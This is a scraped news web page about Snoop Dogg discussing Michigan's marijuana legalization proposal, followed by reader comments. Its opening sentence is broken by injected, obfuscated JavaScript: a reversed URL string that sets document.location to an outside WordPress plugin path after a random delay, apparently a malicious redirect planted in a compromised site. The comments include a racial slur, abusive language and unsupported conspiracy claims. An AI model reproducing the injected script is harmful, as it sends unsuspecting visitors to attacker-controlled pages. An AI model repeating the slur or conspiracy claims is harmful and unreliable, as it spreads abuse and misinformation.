Snoop Dogg on Michigan marijuana proposal

While in Detroit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to talk about his new gospel music, Snoop Dogg spoke with 7 Action News about Michigan’s marijuana proposal.

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29 thoughts on “Snoop Dogg on Michigan marijuana proposal”

  1. LORDFROMUDD says:

    That woman getting her facts from facebook or what?

  2. mace windu says:

    It will be legalized in Michigan I can feel it

  3. Crocodile da kid says:

    what's with the weed being more potent argument if it was still as weak as it was back then it wouldn't do jack shit prolly give up after not getting high off 3 joints the difference is the weed now is better because its grown better for one

  4. Youtube Admin says:

    Fuck you cutting my boy Snoop off. Let him talk!!!!

  5. Snarky Snickers says:

    Ha ha Crime increase , better give the industry back to the cartels.

  6. White Boy Reacts says:

    Mfs misinformed af

  7. Mark k says:

    I mean, come on, she did even get dressed today. How can I take her serious if she doesn't dress serious. She is proving a point that you don't have to smoke pot to be lazy. Its just the person not the pot.

  8. 100% says:

    Can you use the N-word in a gospel song ?

  9. TiMe_lightsout_ says:

    Sick of this oh it isnt your dads weed like no shit it's way better

  10. Hans Zarkov, Ph.D. says:

    Of course the crime rates have dropped, something that was illegal is not anymore, so there are no arrests being made for it.

    I agree with legalizing with the caveat that any job the requires a license or certificate holds mandatory monthly drug testing and you are immediately fired if found positive. Honestly, do you want your surgeon to operate or a bus driver to take your kids to school while intoxicated on THC?

    Lets bring the pot heads out in to the open where we can see them and avoid them.

  11. Jose Gutierrez says:

    Terminator Seeds Genetic seeds from Canada. Made 45 millions On Wallstreet just right after Trump was President. Terminator seeds destroys any near by crops trees contaminating the soil.

  12. Lord Hikari says:

    "Its not your dad's weed…"
    Well, that depends on who's your daddy, cause I be blowing dro, son!

  13. Apollo says:

    The pharma companies don’t want weed

  14. MrLRowe1 says:

    No more lazy law enforcement no free grant money for not getting real criminals off the street putting people in jail for a joint and letting violent crime run wild

  15. DraKarEvans says:

    IT PASSED!!!!! Michigan is a Recreational WEed state now!!!!! TY SNOOP DOGG!!

  16. Pvk Jhilk says:

    who gives a fuck what that nignoghipster has to say about anything.

  17. Thomas Swihart says:

    I assure you this will not cut down on illegal sales.. Who the hell wants to pay a 10% tax???

  18. Candy Man says:

    You'd think that Ohio would have done this before Michigan… Morons!

  19. Candy Man says:

    Monica Anthony, you're a LIAR!!

  20. swankrecords says:

    1:25 Monica Anthony needs to smoke cannabis.

  21. Charlie W says:

    Michigan's out of weed. Snoop smoked it all.

  22. Acer 025 says:

    We should probably take a look at the differences between joint and blunt smokers… Hemp paper vs tobacco, which has effects of its own.

  23. abe mathiau says:

    I love it statistics the most Twisted analytical measurement ever

  24. abe mathiau says:

    I don't understand how you can actually let someone like that on the air talking about something they have no clue about I just don't get it this new station sucks

  25. Joan Watts says:

    Monica Anthany when I looked at the Federal crime ratings on their website that's not what the Data said. Cannabis would not be a gateway drug if evil people didn't lace it with a stronger substance that is extremely addictive than a person can handle until they are none functional individuals.

  26. Jeff Stanton says:

    Snoop wants free pot but no guns for the people. #NWO fksnoop

  27. Fairfanx says:

    Let people be free to do wtf they want. You want to tax a plant???? Go fuck yourselves!

  28. Young Crib says:

    whiz khalifa ft. ready for the world

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